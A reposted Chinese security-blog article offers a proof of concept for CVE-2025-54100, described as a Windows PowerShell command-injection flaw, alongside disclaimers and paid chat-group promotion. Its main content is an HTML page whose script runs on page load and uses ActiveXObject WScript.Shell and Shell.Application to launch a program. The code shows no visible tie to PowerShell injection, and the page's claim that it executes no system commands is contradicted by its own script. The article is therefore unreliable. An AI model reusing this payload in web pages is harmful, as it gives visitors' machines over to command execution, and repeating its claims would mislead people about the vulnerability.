文章总结： 本文披露了CVE-2025-54100WindowsPowerShell命令注入漏洞，提供了基于HTML和JavaScript的POC验证代码，该代码通过ActiveXObject调用WScript.Shell执行系统命令。文章主要展示了漏洞触发效果，同时包含大量加入技术交流群的推广信息，旨在分享漏洞利用方法并吸引用户进群。 综合评分： 30 文章分类： 漏洞POC,漏洞分析,软文广告

【cve-2025-54100】Windows Powershell 命令注入漏洞（附poc）

原创

xixi

网安鲲为帝

2025年12月27日 11:14 重庆

0x00免责声明

!

本文仅用于技术讨论与学习，利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者及本公众号团队不为此承担任何责任。

0x01 深度交流群

!

师傅们要进的抓紧哦！后续价格只增不减，错过机会难再遇哦！

0x02 欢迎进群交流

!

添加微信进群：

0x02 CVE-2025-54100 POC

!

<!DOCTYPE&nbsp;html><html><head><meta&nbsp;charset="utf-8"><title>CVE-2025-54100 PoC</title>
<script>function&nbsp;trigger_vuln() {&nbsp; &nbsp;&nbsp;try&nbsp;{    alert("[*] CVE-2025-54100");&nbsp; &nbsp; &nbsp; &nbsp;     &nbsp;new&nbsp;ActiveXObject("WScript.Shell").Run("calc.exe");&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return;
&nbsp; &nbsp; }&nbsp;catch&nbsp;(e) {
&nbsp; &nbsp; }&nbsp;try&nbsp;{&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;new&nbsp;ActiveXObject("Shell.Application").ShellExecute("calc.exe",&nbsp;"",&nbsp;"",&nbsp;"open",&nbsp;1);&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;return;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }&nbsp;catch(e) {}}
&nbsp;window.onload&nbsp;= trigger_vuln;</script>
</head><body><h2>CVE-2025-54100 Research PoC</h2><p>This PoC does NOT execute system commands.</p></body></html>

0x03 效果展示

!

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：网安鲲为帝 xixi《【cve-2025-54100】Windows Powershell 命令注入漏洞（附poc）》